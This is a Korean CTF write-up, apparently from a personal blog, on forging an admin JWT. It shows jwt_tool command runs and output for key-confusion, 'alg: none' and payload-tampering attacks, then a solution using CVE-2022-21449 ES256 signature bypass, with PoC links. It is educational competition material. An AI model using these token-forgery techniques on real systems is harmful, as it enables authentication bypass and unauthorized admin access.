고정 헤더 영역
상세 컨텐츠
본문
728x90
반응형
trial #1 jwt tool 사용하여 jwt 생성 (실패)
python3 jwt_tool.py eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJndWVzdCJ9.wFkVBMFFYKFY2eC2PBPC9fN1nyypfMIudI6lmrgQJBNQKFxw-SZHbhVlz7i1R_ufsUujq85bZUU7G_GL2VnoLQ -X k -pk /Users/koharin/.jwt_tool/jwttool_custom_public_EC.pem
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.6 \______| @ticarpi
Original JWT:
File loaded: /Users/koharin/.jwt_tool/jwttool_custom_public_EC.pem
jwttool_174d67fd7ae4a50c2e15d629a872fb6f - EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJndWVzdCJ9.Vx_ateaSdzCE5s4HNrJU4pW1UKsHoj6ugmnkhRbvd7wpython3 jwt_tool/jwt_tool.py eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJndWVzdCJ9.JHLYb9VnzZGvewxi1S5OyJi6pEw161wcUVJqHquIS2xOvCIgrAO85v9jpGscLXcNh54a5P4XZiulOBIPSAhaQA -T -S es256
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.6 \______| @ticarpi
Original JWT:
====================================================================
This option allows you to tamper with the header, contents and
signature of the JWT.
====================================================================
Token header values:
[1] alg = "ES256"
[2] *ADD A VALUE*
[3] *DELETE A VALUE*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
Token payload values:
[1] sub = "guest"
[2] *ADD A VALUE*
[3] *DELETE A VALUE*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 1
Current value of sub is: guest
Please enter new value and hit ENTER
> admin
[1] sub = "admin"
[2] *ADD A VALUE*
[3] *DELETE A VALUE*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
jwttool_f28d1067c75a67087eb82593ebeaeacd - Tampered token - EC Signing:
[+] eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJhZG1pbiJ9.k67d4GGzcmQyb_bLXjeLpnTyQ_K1j5-b0y3KzjWtk2etRnvDvZZhTHCqtojUTZDGulr7cl3XmCO_BNJT4UDfKQjwttool_e4966bb08199b70d934f637e95dd03e7 - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_47de7d0e3c6a526cc79028ac02644778 - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_f2bdddbc37c4a885a9ead149be5db4f6 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIn0.eyJzdWIiOiJndWVzdCJ9.
jwttool_1b0f6745c5519a32f768a554c0b8d1e3 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIn0.eyJzdWIiOiJndWVzdCJ9.jwttool에서 제공하는 익스플로잇 코드나 alg가 none인 여러 경우에 대해 생성된 jwt를 테스트해봤을 때 다 안 됐다.
trial #2 기존 ctf에서 타원곡선 알고리즘일 때 풀이 사용 (실패)
https://ctftime.org/writeup/26445
위 익스플로잇 코드는 제공되는 jwt 기반으로 유추를 하고 jwt 키를 생성하는 풀이(?)라서 문제 상황에 맞게 고쳐서 해봤는데, 역시 안 됐다.
trial #3 CVE-2022-21449
ES256 알고리즘에서의 jwt 관련한 원데이를 사용할 수 있는 문제인가? 싶어서 구글링을 해서
https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/
이 링크까지는 대회 때 찾았다. 근데 poc를 안 찾아봄,,,
https://gist.github.com/righettod/1d2f4498e3dba4fc779036ce83565d68
위 링크에서 header.body.signature 키가 있는데, header, signature는 그대로 사용하고 body만 sub: admin일 때를 주면 된다..
poc 인증하여 플래그 획득
728x90
반응형
'WEB HACKING' 카테고리의 다른 글
| [LINE CTF 2024] jalyboy-baby (0) | 2024.03.24 |
|---|---|
| [HackCTF] 보물 (0) | 2022.01.07 |
| [HackCTF] Button (0) | 2022.01.07 |
| [HackCTF] / (Web) (0) | 2022.01.07 |
| [HackCTF] Hidden (0) | 2021.05.03 |
